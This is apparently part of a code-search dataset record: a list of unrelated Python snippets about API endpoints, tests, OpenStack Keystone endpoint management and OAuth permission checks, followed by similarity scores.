marketplace_subscriptions.get_list_of_subscriptions(\n user_account_number, filter_out_org_bindings=True, convert_to_stripe_plans=True\n )\n return plans", "def api_callcounter():\n try:\n return jsonify({'callcounter': get_model().call_counter})\n except Exception as e:\n response = jsonify({'error': 'API error'})\n response.status_code = 400\n return response", "def test_all_applications_info(self, mocked_get, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # prepare context\n self.supervisor.supvisors.context.applications = {\n 'dummy_1': None, 'dummy_2': None}\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertItemsEqual([{'name': 'appli_1'}, {'name': 'appli_2'}],\n rpc.get_all_applications_info())\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertItemsEqual([call('dummy_1'), call('dummy_2')],\n mocked_get.call_args_list)", "def request_endpoints(self):\n\n endpoints_url = self.std[\"api\"]\n endpoints_paramd = {\n \"access_token\": self.std[\"access_token\"]\n }\n\n endpoints_response = requests.get(url=endpoints_url, params=endpoints_paramd)\n print endpoints_response\n self.endpointd = endpoints_response.json()[0]", "def is_http(self):\n for _, topic_info in self.resources.items():\n if topic_info.get(\"subscription\"):\n return True\n return False", "def _test_network_list_for_tenant(\n self, include_external, filter_params, should_called,\n expected_networks, source_networks=None, **extra_kwargs):\n has_more_data = None\n has_prev_data = None\n marker_calls = []\n filter_params = filter_params or {}\n if 'page_data' not in extra_kwargs:\n call_args = {'single_page': False}\n else:\n sort_dir = extra_kwargs['page_data']['sort_dir']\n # invert sort_dir for calls\n sort_dir = 'asc' if sort_dir == 'desc' else 'desc'\n call_args = {'single_page': True, 'limit': 21, 'sort_key': 'id',\n 'sort_dir': sort_dir}\n marker_id = extra_kwargs['page_data'].get('marker_id')\n if extra_kwargs.get('marker_calls') is not None:\n marker_calls = extra_kwargs.pop('marker_calls')\n\n tenant_id = '1'\n return_values = []\n all_networks = (self.networks.list() if source_networks is None\n else source_networks)\n\n expected_calls = []\n call_order = ['shared', 'non_shared', 'external']\n if call_args.get('sort_dir') == 'desc':\n call_order.reverse()\n\n for call in call_order:\n if call in should_called:\n params = filter_params.copy()\n params.update(call_args)\n if call in marker_calls:\n params.update({'marker': marker_id})\n if call == 'external':\n params['router:external'] = True\n params['shared'] = False\n return_values.append(\n [n for n in all_networks\n if n['router:external'] is True and\n n['shared'] is False])\n expected_calls.append(\n mock.call(test.IsHttpRequest(), **params))\n elif call == 'shared':\n params['shared'] = True\n external = params.get('router:external')\n return_values.append(\n [n for n in all_networks\n if (n['shared'] is True and\n n['router:external'] == (\n external if external is not None\n else n['router:external']))])\n expected_calls.append(\n mock.call(test.IsHttpRequest(), **params))\n elif call == 'non_shared':\n params['shared'] = False\n external = params.get('router:external')\n return_values.append(\n [n for n in all_networks\n if (n['tenant_id'] == '1' and\n n['shared'] is False and\n n['router:external'] == (\n external if external is not None\n else n['router:external']))])\n expected_calls.append(\n mock.call(test.IsHttpRequest(),\n tenant_id=tenant_id, **params))\n 
self.mock_network_list.side_effect = return_values\n\n extra_kwargs.update(filter_params)\n ret_val = api.neutron.network_list_for_tenant(\n self.request, tenant_id,\n include_external=include_external,\n **extra_kwargs)\n if 'page_data' in extra_kwargs:\n has_more_data = ret_val[1]\n has_prev_data = ret_val[2]\n ret_val = ret_val[0]\n self.mock_network_list.assert_has_calls(expected_calls)\n self.assertEqual(set(n.id for n in expected_networks),\n set(n.id for n in ret_val))\n self.assertNotIn(api.neutron.AUTO_ALLOCATE_ID,\n [n.id for n in ret_val])\n return ret_val, has_more_data, has_prev_data", "def test_rpcCall(self):\n pass", "def test_simple1(self):\n api = self.load_api_description('simple1.json')\n self.assertEqual(api.name, 'Starbucks')\n self.assertEqual(len(api.resources), 1)\n\n resource = api.resources[0]\n self.assertEqual(resource.name, 'AllOrders')\n self.assertEqual(resource.path, '/')\n self.assertEqual(len(resource.operations), 1)\n\n operation = resource.operations[0]\n self.assertEqual(operation.method, 'GET')\n self.assertIsNone(operation.input)\n output = operation.output\n self.assertEqual(output.status, 200)\n self.assertEqual(output.type.type.get_reference_name(), 'list(string)')\n self.assertEqual(len(output.contentType), 1)\n self.assertEqual(output.contentType[0], 'json')\n\n self.assertEqual(len(api.base), 1)\n self.assertEqual(api.base[0], 'http://test.com/starbucks')", "def test_404(self):\n response = self.make_call(origin='Milano Lambrate', destination='Milano Cadorna')\n self.assert400(response)", "def test_fax_inbound_automations_get(self):\n pass", "def test_get_callers():\n assert re.search(\"midgard.tests.dev.test_util.test_get_callers\", util.get_callers())", "def test_is_ghibli_api_request_working(self):\n\n films = retrieveMoviesFromGhibliAPI()\n self.assertIs(type(films), list)\n\n for film in films:\n self.assertTrue('people' in film)", "def response_validator(url_dict, host_name_ip, api_endpoint):\r\n for key, value in url_dict.items():\r\n url_framed = url_framer_or_formatter(value.strip(),host_name_ip) + api_endpoint\r\n logger.debug(\"{} Executing request for {}::{} {}\".format(\"#\" * 20, key,url_framed, \"#\" * 20))\r\n status_code, response_data, error_msg = common_http_validator(method='GET', url=url_framed)\r\n if status_code == 200:\r\n logger.debug(\"{} ok status obtained with response message as {}\".format(status_code,json.loads(response_data)['status']))\r\n else:\r\n logger.debug(\"{} status with response as {} and exception message as {}\".format(status_code,response_data,error_msg))\r\n\r\n logger.debug(\"{} Request execution completed for {}::{} {}\".format(\"#\" * 20, key,url_framed, \"#\" * 20))", "def endpoint_present(\n name,\n publicurl=None,\n internalurl=None,\n adminurl=None,\n region=None,\n profile=None,\n url=None,\n interface=None,\n **connection_args\n):\n ret = {\"name\": name, \"changes\": {}, \"result\": True, \"comment\": \"\"}\n\n _api_version(profile=profile, **connection_args)\n\n endpoint = __salt__[\"keystone.endpoint_get\"](\n name, region, profile=profile, interface=interface, **connection_args\n )\n\n def _changes(desc):\n return ret.get(\"comment\", \"\") + desc + \"\\n\"\n\n def _create_endpoint():\n if _OS_IDENTITY_API_VERSION > 2:\n ret[\"changes\"] = __salt__[\"keystone.endpoint_create\"](\n name,\n region=region,\n url=url,\n interface=interface,\n profile=profile,\n **connection_args\n )\n else:\n ret[\"changes\"] = __salt__[\"keystone.endpoint_create\"](\n name,\n region=region,\n 
publicurl=publicurl,\n adminurl=adminurl,\n internalurl=internalurl,\n profile=profile,\n **connection_args\n )\n\n if endpoint and \"Error\" not in endpoint and endpoint.get(\"region\") == region:\n\n if _OS_IDENTITY_API_VERSION > 2:\n\n change_url = False\n change_interface = False\n\n if endpoint.get(\"url\", None) != url:\n ret[\"comment\"] = _changes(\n 'URL changes from \"{}\" to \"{}\"'.format(\n endpoint.get(\"url\", None), url\n )\n )\n change_url = True\n\n if endpoint.get(\"interface\", None) != interface:\n ret[\"comment\"] = _changes(\n 'Interface changes from \"{}\" to \"{}\"'.format(\n endpoint.get(\"interface\", None), interface\n )\n )\n change_interface = True\n\n if __opts__.get(\"test\") and (change_url or change_interface):\n ret[\"result\"] = None\n ret[\"changes\"][\"Endpoint\"] = \"Will be updated\"\n ret[\"comment\"] += 'Endpoint for service \"{}\" will be updated'.format(\n name\n )\n return ret\n\n if change_url:\n ret[\"changes\"][\"url\"] = url\n\n if change_interface:\n ret[\"changes\"][\"interface\"] = interface\n\n else:\n change_publicurl = False\n change_adminurl = False\n change_internalurl = False\n\n if endpoint.get(\"publicurl\", None) != publicurl:\n change_publicurl = True\n\n ret[\"comment\"] = _changes(\n 'Public URL changes from \"{}\" to \"{}\"'.format(\n endpoint.get(\"publicurl\", None), publicurl\n )\n )\n\n if endpoint.get(\"adminurl\", None) != adminurl:\n change_adminurl = True\n ret[\"comment\"] = _changes(\n 'Admin URL changes from \"{}\" to \"{}\"'.format(\n endpoint.get(\"adminurl\", None), adminurl\n )\n )\n\n if endpoint.get(\"internalurl\", None) != internalurl:\n change_internalurl = True\n ret[\"comment\"] = _changes(\n 'Internal URL changes from \"{}\" to \"{}\"'.format(\n endpoint.get(\"internalurl\", None), internalurl\n )\n )\n\n if __opts__.get(\"test\") and (\n change_publicurl or change_adminurl or change_internalurl\n ):\n ret[\"result\"] = None\n ret[\"comment\"] += 'Endpoint for service \"{}\" will be updated'.format(\n name\n )\n ret[\"changes\"][\"Endpoint\"] = \"Will be updated\"\n return ret\n\n if change_publicurl:\n ret[\"changes\"][\"publicurl\"] = publicurl\n\n if change_adminurl:\n ret[\"changes\"][\"adminurl\"] = adminurl\n\n if change_internalurl:\n ret[\"changes\"][\"internalurl\"] = internalurl\n\n if ret[\"comment\"]: # changed\n __salt__[\"keystone.endpoint_delete\"](\n name, region, profile=profile, interface=interface, **connection_args\n )\n _create_endpoint()\n ret[\"comment\"] += 'Endpoint for service \"{}\" has been updated'.format(name)\n\n else:\n # Add new endpoint\n if __opts__.get(\"test\"):\n ret[\"result\"] = None\n ret[\"changes\"][\"Endpoint\"] = \"Will be created\"\n ret[\"comment\"] = 'Endpoint for service \"{}\" will be added'.format(name)\n return ret\n _create_endpoint()\n ret[\"comment\"] = 'Endpoint for service \"{}\" has been added'.format(name)\n\n if ret[\"comment\"] == \"\": # => no changes\n ret[\"comment\"] = 'Endpoint for service \"{}\" already exists'.format(name)\n return ret", "def test_endpoint_status(self) -> None:\n status = self.client.endpoint_status\n self.assertIsInstance(status, dict)", "def test_list_authz_missing_dn_or_op(self):\n self.app.get(\"/config/authorize?operation=config\", status=200)\n self.app.get(\"/config/authorize?dn=/DN=a.test.user\", status=200)", "def test_get_non_existent_campaigns_returns_empty_list(self):\n response = self.client.get(self.endpoint_url)\n response_body = response.get_json()\n self.assertEqual(response.status_code, 200)\n 
self.assertEqual(response_body, {\"campaigns\": []})", "def response_contains_array_named(context, array_name):\n assert context.response\n response = context.response.json()\n assert array_name in response\n assert isinstance(response[array_name], list)", "def test_get_contact_lists(self):\n url, parsed = self.prepare_urls('v1:contact_list-list', subdomain=self.company.subdomain)\n \n response = self.client.get(url, HTTP_HOST=parsed.netloc)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n self.authenticate_user()\n response = self.client.get(url, HTTP_HOST=parsed.netloc)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n content = json.loads(response.content)\n self.assertEqual(len(content), self.contact_lists_count)", "def is_subcall(self):\n return False", "def is_caller_for_call_campaign(call_profile):\n caller_campaigns = find_campaigns_as_caller(call_profile)\n is_caller = len(caller_campaigns) > 0\n return is_caller", "def test_aws_service_api_interfaces_get(self):\n pass", "def _namespace_requested(self, namespace):\r\n if namespace is None:\r\n return False\r\n namespace_tuple = self._tuplefy_namespace(namespace)\r\n if namespace_tuple[0] in IGNORE_DBS:\r\n return False\r\n elif namespace_tuple[1] in IGNORE_COLLECTIONS:\r\n return False\r\n else:\r\n return self._tuple_requested(namespace_tuple)", "def test_missing_endpoint(self, req):\n req.side_effect = ks_exc.EndpointNotFound()\n self.client._get_resource_provider(self.context, \"fake\")\n\n # reset the call count to demonstrate that future calls still\n # work\n req.reset_mock()\n self.client._get_resource_provider(self.context, \"fake\")\n self.assertTrue(req.called)", "def check_ngin_access(subdata):\r\n r = verifyPort(999)\r\n print (r.status_code)\r\n if r.status_code == 204:\r\n return True\r\n else:\r\n return False\r\n \"\"\"\r\n if (subdata[0][0]):\r\n return True \r\n else:\r\n return False\r\n \"\"\"", "def _get_endpoint_list(name, filter_by, limit, offset, quiet, all_items):\n\n get_endpoint_list(name, filter_by, limit, offset, quiet, all_items)", "def test_grpc_app(self):\n self.assertTrue(isinstance(grpc_settings.grpc_apps, list))", "def _running_locally(coreapi_url, jobs_api_url):\n return not (coreapi_url and jobs_api_url)", "def test_urls(self):\n self.base_check_request(\"get\", \"/\")\n self.base_check_request(\"get\", \"apartments/\")\n self.base_check_request(\"get\", \"complexes/\")\n self.base_check_request(\"get\", \"locations/\")\n self.base_check_request(\"get\", \"companies/\")\n self.base_check_request(\"get\", \"companies-types/\")\n\n self.base_check_request(\"get\", \"count/apartments/\")\n self.base_check_request(\"get\", \"count/complexes/\")\n\n self.base_check_request(\"get\", \"search-forms/apartments/\")\n self.base_check_request(\"get\", \"search-forms/complexes/\")\n self.base_check_request(\"get\", \"search-forms/main/\")\n\n self.base_check_request(\"get\", \"autocomplete/companies/\")\n self.base_check_request(\"get\", \"autocomplete/complexes/\")\n self.base_check_request(\"get\", \"autocomplete/locations/\")\n\n self.base_check_request(\"get\", \"apartments_for_maps/?count=1&fields=lat,lon\")\n # self.base_check_request(\"get\", \"reserve/\")\n # self.base_check_request(\"get\", \"complain/\")\n # self.base_check_request(\"post\", \"apartment-complain/\")\n # self.base_check_request(\"post\", \"order-apartment/\")", "def test_basic_api_inline_openapi(self):\n self.create_and_verify_stack(\"single/basic_api_inline_openapi\")\n\n first_dep_ids = 
self.get_stack_deployment_ids()\n self.assertEqual(len(first_dep_ids), 1)\n\n body = self.get_template_resource_property(\"MyApi\", \"DefinitionBody\")\n body[\"basePath\"] = \"/newDemo\"\n self.set_template_resource_property(\"MyApi\", \"DefinitionBody\", body)\n self.update_stack()\n\n second_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(second_dep_ids), 1)\n\n self.assertEqual(len(set(first_dep_ids).intersection(second_dep_ids)), 0)", "def test_empty_list(self):\n response = self.client.get(self.api_link)\n self.assertEqual(response.status_code, 200)\n\n response_json = response.json()\n self.assertEqual(response_json['count'], 0)", "def test_class_has_url_for(self):\n self.assertNotEqual(NamedDocument.url_for_endpoints, ScopedNamedDocument.url_for_endpoints)", "def test_list(self):\n url = '/api/users/'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n r = response.json()\n self.assertTrue(isinstance(r['objects'], list))\n # Response should not contain inactive, contractors or shared accounts.\n self.assertContains(response, self.user1.email)\n self.assertNotContains(response, self.del_user.email)\n self.assertNotContains(response, self.contract_user.email)\n self.assertNotContains(response, self.shared.email)\n # Test the compact response.\n url = '/api/users/?compact=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n # Test the minimal response.\n url = '/api/users/?minimal=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)", "def api_base_checks(request, requester, services, cnxn,\n auth_client_ids, auth_emails):\n valid_user = False\n auth_err = ''\n client_id = None\n\n try:\n client_id = oauth.get_client_id(framework_constants.OAUTH_SCOPE)\n logging.info('Oauth client ID %s', client_id)\n except oauth.Error as ex:\n auth_err = 'oauth.Error: %s' % ex\n\n if not requester:\n try:\n requester = oauth.get_current_user(framework_constants.OAUTH_SCOPE)\n logging.info('Oauth requester %s', requester.email())\n except oauth.Error as ex:\n logging.info('Got oauth error: %r', ex)\n auth_err = 'oauth.Error: %s' % ex\n\n if client_id and requester:\n if client_id in auth_client_ids:\n # A whitelisted client app can make requests for any user or anon.\n logging.info('Client ID %r is whitelisted', client_id)\n valid_user = True\n elif requester.email() in auth_emails:\n # A whitelisted user account can make requests via any client app.\n logging.info('Client email %r is whitelisted', requester.email())\n valid_user = True\n else:\n auth_err = ('Neither client ID %r nor email %r is whitelisted' %\n (client_id, requester.email()))\n\n if not valid_user:\n raise endpoints.UnauthorizedException('Auth error: %s' % auth_err)\n else:\n logging.info('API request from user %s:%s', client_id, requester.email())\n\n project_name = None\n if hasattr(request, 'projectId'):\n project_name = request.projectId\n issue_local_id = None\n if hasattr(request, 'issueId'):\n issue_local_id = request.issueId\n # This could raise exceptions.NoSuchUserException\n requester_id = services.user.LookupUserID(cnxn, requester.email())\n auth = authdata.AuthData.FromUserID(cnxn, requester_id, services)\n if permissions.IsBanned(auth.user_pb, auth.user_view):\n raise permissions.BannedUserException(\n 'The user %s has been banned from using Monorail' %\n requester.email())\n if project_name:\n project = services.project.GetProjectByName(\n cnxn, project_name)\n if not project:\n raise 
exceptions.NoSuchProjectException(\n 'Project %s does not exist' % project_name)\n if project.state != project_pb2.ProjectState.LIVE:\n raise permissions.PermissionException(\n 'API may not access project %s because it is not live'\n % project_name)\n if not permissions.UserCanViewProject(\n auth.user_pb, auth.effective_ids, project):\n raise permissions.PermissionException(\n 'The user %s has no permission for project %s' %\n (requester.email(), project_name))\n if issue_local_id:\n # This may raise a NoSuchIssueException.\n issue = services.issue.GetIssueByLocalID(\n cnxn, project.project_id, issue_local_id)\n perms = permissions.GetPermissions(\n auth.user_pb, auth.effective_ids, project)\n config = services.config.GetProjectConfig(cnxn, project.project_id)\n granted_perms = tracker_bizobj.GetGrantedPerms(\n issue, auth.effective_ids, config)\n if not permissions.CanViewIssue(\n auth.effective_ids, perms, project, issue,\n granted_perms=granted_perms):\n raise permissions.PermissionException(\n 'User is not allowed to view this issue %s:%d' %\n (project_name, issue_local_id))\n\n return client_id, requester.email()", "def test_basic_api_inline_swagger(self):\n self.create_and_verify_stack(\"single/basic_api_inline_swagger\")\n\n first_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(first_dep_ids), 1)\n\n body = self.get_template_resource_property(\"MyApi\", \"DefinitionBody\")\n body[\"basePath\"] = \"/newDemo\"\n self.set_template_resource_property(\"MyApi\", \"DefinitionBody\", body)\n self.update_stack()\n\n second_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(second_dep_ids), 1)\n\n self.assertEqual(len(set(first_dep_ids).intersection(second_dep_ids)), 0)", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def ping_missing_api(request):\r\n return _api_response(request, {\r\n 'success': False,\r\n 'message': 'The API url should be /api/v1'\r\n })", "def test_api(test_name, endpoint, method, body, expected_response, expected_status_code, validation, params):\n response = None\n with allure.step(' '.join(['getting API response on endpoint:', str(endpoint)])):\n response = APIRequestor().request(method=method, url_path=endpoint, body=body, params=params)\n with allure.step(' '.join(['Asserting API status code expected:', str(expected_status_code), ', with response:', str(response.status_code)])):\n Compare.equal.__call__(a=expected_status_code, b=response.status_code, free_text=f\"Status code is not as expected: {response.status_code} instead of expected: {expected_status_code}\")\n with allure.step('starting API validation'):\n validation = 'equal' if not validation else validation\n with allure.step(' '.join(['Validation with method:', str(validation)])):\n Compare.__dict__[validation](a=str(response), b=str(expected_response),\n free_text=f\"Failed to compare, Response is not as expected: {response} instead of {expected_response}\")" ]
[ "0.62145686", "0.6031098", "0.597374", "0.59650505", "0.5733628", "0.55599207", "0.54912245", "0.54800916", "0.54037213", "0.5337027", "0.531804", "0.523795", "0.5225318", "0.5171135", "0.516988", "0.51654184", "0.5162458", "0.51472855", "0.51333857", "0.5127361", "0.5116722", "0.51103735", "0.5095321", "0.5081825", "0.5074543", "0.5068515", "0.5068172", "0.50617015", "0.5056106", "0.5055193", "0.5043452", "0.50354517", "0.5034325", "0.5024378", "0.50203836", "0.5014894", "0.49833632", "0.49799943", "0.49722326", "0.4961915", "0.49484244", "0.4936004", "0.4929235", "0.49259934", "0.4922954", "0.48972976", "0.48947394", "0.48833722", "0.48804182", "0.48709354", "0.48618183", "0.48608372", "0.48607847", "0.4857872", "0.48257625", "0.4821477", "0.48192298", "0.48083752", "0.48080382", "0.48008144", "0.479831", "0.47922242", "0.47866535", "0.47850537", "0.4779812", "0.47778076", "0.477043", "0.47680977", "0.475497", "0.47336307", "0.47305372", "0.47282237", "0.4727771", "0.47226912", "0.47188845", "0.47170278", "0.47043926", "0.4703479", "0.46961832", "0.46916613", "0.4689373", "0.46891242", "0.46886733", "0.4685948", "0.4683022", "0.467961", "0.46795642", "0.46763006", "0.46759635", "0.46759343", "0.46739724", "0.4663874", "0.4657999", "0.46579626", "0.4657374", "0.4650167", "0.46498704", "0.46493903", "0.46474797", "0.46438694" ]
0.77283394
0
Test for documentation on Call API Endpoint view
def test_documentation_for_call_view():

    url = reverse_lazy('calls:call-list')
    view = resolve(url).func

    assert view.__doc__
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_view_detail_as_method(self):\n url = reverse(\n \"django-admindocs-views-detail\",\n args=[\"django.contrib.admin.sites.AdminSite.index\"],\n )\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)", "def test_view():\n\treturn \"this is a response\"", "def test_view_browsable_api(client):\n # Arbitrary endpoint. Important thing is we access an endpoint of\n # the browsable API and force an HTML response so that template\n # rendering is used.\n client.get(\"/accounts/users/\", HTTP_ACCEPT=\"text/html\")", "def testApi(self):", "def test_get_view_html(self):\n response = self.setup_get_html_test('/api/view/1')\n self.assertEqual(response.status_code, 200)", "def test_call(self):\r\n self.assertEqual(self.cs_overview(), {})\r\n self.assertEqual(self.cs_overview(10), {})", "def test_GET_call_api_and_return_200Ok(client):\n\n url = '/api/v1/calls/'\n\n response = client.get(url)\n\n assert response.status_code == status.HTTP_200_OK", "def test_get_response(self):\n c = Client()\n response = c.get(reverse('index_view'))\n self.assertEqual(response.status_code, 200)", "def test_get_api_resources(self):\n pass", "def test_callable_urlconf(self):\n\n def urlpatterns():\n return (\n path(\"admin/doc/\", include(\"django.contrib.admindocs.urls\")),\n path(\"admin/\", admin.site.urls),\n )\n\n with self.settings(ROOT_URLCONF=SimpleLazyObject(urlpatterns)):\n response = self.client.get(reverse(\"django-admindocs-views-index\"))\n self.assertEqual(response.status_code, 200)", "def test_view_url_exists_api_alerts(self):\n response = self.client.get('/api/alerts/')\n self.assertEqual(response.status_code, 200)", "def test_view(self):\n self.assertEqual(status.HTTP_200_OK, self.response.status_code)", "def test_TodoList_views_get(self):\n # testing the urls\n client = Client()\n response = client.get(reverse('TodoList'))\n self.assertEqual(response.status_code,200)\n #self.assertTemplateUsed(response,'webapp/todolistmodel.html')", "def test_view_index_with_method(self):\n response = self.client.get(reverse(\"django-admindocs-views-index\"))\n self.assertContains(\n response,\n \"<h3>\"\n '<a href=\"/admindocs/views/django.contrib.admin.sites.AdminSite.index/\">'\n \"/admin/</a></h3>\",\n html=True,\n )", "def api():\n\treturn \"The API call\"", "def test_simple_request(self):\n urls = [\"https://api.omniture.com/admin/1.4/rest/\",\n \"https://api2.omniture.com/admin/1.4/rest/\",\n \"https://api3.omniture.com/admin/1.4/rest/\",\n \"https://api4.omniture.com/admin/1.4/rest/\",\n \"https://api5.omniture.com/admin/1.4/rest/\"]\n self.assertIn(self.analytics.request('Company', 'GetEndpoint'),urls, \"Company.GetEndpoint failed\" )", "def _access_endpoint(self, endpoint, args, status_code, msg):\r\n url = reverse(endpoint, kwargs={'course_id': self.course.id.to_deprecated_string()})\r\n if endpoint in ['send_email']:\r\n response = self.client.post(url, args)\r\n else:\r\n response = self.client.get(url, args)\r\n self.assertEqual(\r\n response.status_code,\r\n status_code,\r\n msg=msg\r\n )", "def test_get_allowed_methods(self):\n from django.contrib.auth.models import User\n\n class MyViewSet(ModelViewSet):\n serializer_class = CommentSerializer\n model = User\n\n docgen = DocumentationGenerator()\n\n # Test a list endpoint\n allowed_methods = docgen.__get_allowed_methods__(MyViewSet, '/api/endpoint')\n self.assertEqual(2, len(allowed_methods))\n self.assertIn('POST', allowed_methods)\n self.assertIn('GET', allowed_methods)\n\n # Test an object endpoint\n allowed_methods 
= docgen.__get_allowed_methods__(MyViewSet, '/api/endpoint/{pk}')\n self.assertEqual(4, len(allowed_methods))\n self.assertIn('POST', allowed_methods)\n self.assertIn('PATCH', allowed_methods)\n self.assertIn('DELETE', allowed_methods)\n self.assertIn('GET', allowed_methods)", "def test_1():\n\tassert api_call().status_code == 200", "def test_mocked_get_list_template(self):\n c = Client()\n response = c.get(reverse('mocked'))\n self.assertEqual(response.status_code, 200)\n self.assertIn(\"Here is the list of all possible apis:\",\n response.content)\n self.assertIn(\"^mocked_post$\", response.content)", "def test_mocked_get_list_template(self):\n c = Client()\n response = c.get(reverse('mocked'))\n self.assertEqual(response.status_code, 200)\n self.assertIn(\"Here is the list of all possible apis:\",\n response.content)\n self.assertIn(\"^mocked_get$\", response.content)", "def test_api_response_data(self):", "def test_get(self):\n request_factory = RequestFactory()\n request = request_factory.get(reverse('popular_devices'))\n response = PopularDevicesView.as_view()(request)\n\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n request_factory = RequestFactory()\n request = request_factory.get(reverse('filter_devices'))\n response = FilterDevicesView.as_view()(request)\n\n self.assertEqual(response.status_code, 200)", "def test_get_one(self):\n response = self.client.get('/api/v1/parcels/100')\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n pass", "def test_index(self):\n resp = self.app.get('/')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n self.assertIn('Inventory Demo REST API Service', resp.data)\n # resp = self.app.get('/')\n # self.assertEqual(resp.status_code, status.HTTP_200_OK)\n # data = json.loads(resp.data)\n # self.assertEqual(data['name'], 'Inventory Demo REST API Service')", "def api(self) -> str:", "def test_doc():\n pass", "def test_index(self):\n resp = self.app.get(\"/\")\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n self.assertIn(b\"Product Demo REST API Service\", resp.data)", "def test_index_view(self):\n response = self.client.get(reverse('index'))\n self.assertEquals(response.status_code, 200)", "def get(self, request, format=None):\n an_apiview = [\n \"User HTTp methods get, put, post, delete method\",\n \"very similar to previous Django view\",\n \"gives you more control on api logic\",\n 'Is mapped to manually to urls'\n ]\n\n return Response({'message':\"hello\", \"an_apiview\": an_apiview} )", "def test_59_help_api(self):\r\n Fixtures.create()\r\n url = \"/help/api\"\r\n res = self.app.get(url, follow_redirects=True)\r\n err_msg = \"There should be a help api page\"\r\n assert \"API Help\" in res.data, err_msg", "def test_namespace_of_call_api_endpoint():\n\n url = '/api/v1/calls/'\n resolved = resolve(url)\n\n assert resolved.namespace == 'calls'\\\n and resolved.url_name == 'call-list'", "def test_office_list(self):\n url = '/api/v1/consultorios/'\n request = self.client.get(url)\n self.assertEqual(request.status_code, status.HTTP_200_OK)", "def get(self,request,format = None):\n an_apiview = [\n 'Uses HTTP methods as function (get,post,patch,put,delete)',\n 'Is similar to a traditional Django View',\n 'Gives you the most control over your appliction logic',\n 'Is mapped manually to URLs'\n ]\n return Response({'message':'Hello!','an_apiview': an_apiview})", "def test_api_list_view(dummy_request, add_models):\n from learning_journal.views.default import api_list_view\n assert 
len(api_list_view(dummy_request)) == len(ENTRIES)", "def test_index_view(self):\n response = self.client.get('/')\n eq_(response.status_code, 200)", "def test_api_response(self):\n # url = 'http://127.0.0.1:8000/api/aircraft/'\n url = reverse('airlines:aircraft-list')\n response = self.client.get(url, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def get(self, request, format=None):\n an_apiview = [\n 'Uses HTTP methods as functions(get, post, patch, put, delete)',\n 'Is similar to traditional Django view',\n 'Give you the most control over your app logic',\n 'Is mapped manually to URLs'\n ]\n return Response({'message':'Hello!', 'an_apiview':an_apiview})", "def test_get(self):\n self.assertEqual(200, self.response.status_code)", "def test_get(self):\n self.assertEqual(200, self.response.status_code)", "def test_about_view(self):\n print 'Running %s ...' % getName()\n# test that URL resolves to correct views function \n found = resolve('/sequencelistings/about/')\n self.assertEqual(found.func, views.about)\n \n self.sequenceListingFixture.create_sequence_instance(self.sequenceListing)\n \n response = self.client.get(reverse('sequencelistings:about'))\n self.assertEqual(response.status_code, 200)\n \n# test that the page returns expected html contents\n self.assertContains(response, 'About')\n self.assertContains(response, 'only for information purposes')", "def test_00_api_get(self):\r\n # GET as Anonymous\r\n url = '/api/'\r\n action = 'get'\r\n self.check_limit(url, action, 'app')", "def test_help_route():\n response = client.get(\"/\")\n assert response.status_code == 200\n assert response.json() == {\n \"repositories\": f\"{DOMAIN_NAME}/repositories\",\n \"developers\": f\"{DOMAIN_NAME}/developers\",\n \"docs\": f\"{DOMAIN_NAME}/docs\",\n \"redoc\": f\"{DOMAIN_NAME}/redoc\",\n }", "def test_faq_view(self):\n response = self.client.get(url_for('main.faq'))\n self.assertEqual(response.status_code, 200)", "def web_service_response_example(self, action, controller):", "def test_the_info_view(self):\n\n info_url = resolve('/')\n self.assertEqual(info_url.func.__name__, 'Info_view')\n self.assertEqual(self.response.status_code, 200)", "def test_view(self):\n # regular call\n resp = self.is_callable()\n self.assertEqual(\n resp.template_name[0], 'calendarium/calendar_month.html', msg=(\n 'Returned the wrong template.'))\n self.is_postable(data={'next': True}, to_url_name='calendar_month')\n self.is_postable(data={'previous': True}, to_url_name='calendar_month')\n self.is_postable(data={'today': True}, to_url_name='calendar_month')\n\n # called with a invalid category pk\n self.is_callable(data={'category': 'abc'})\n\n # called with a non-existant category pk\n self.is_callable(data={'category': '999'})\n\n # called with a category pk\n category = mixer.blend('calendarium.EventCategory')\n self.is_callable(data={'category': category.pk})\n\n # called with wrong values\n self.is_not_callable(kwargs={'year': 2000, 'month': 15})", "def test_detail_views(self):\n obj = self.create_post(title='Some new title for new test')\n response = self.client.get(obj.get_absolute_url())\n # TODO You need to check that the description and title are present in the html returned from the server Dilshad\n self.assertEqual(response.status_code, 200)", "def test_get_offers(self):\n pass", "def test_response(self):\n\n request = self.factory.get(self.url)\n\n response = ProviderInfoView.as_view()(request)\n\n self.assertEqual(response.status_code, 200)\n 
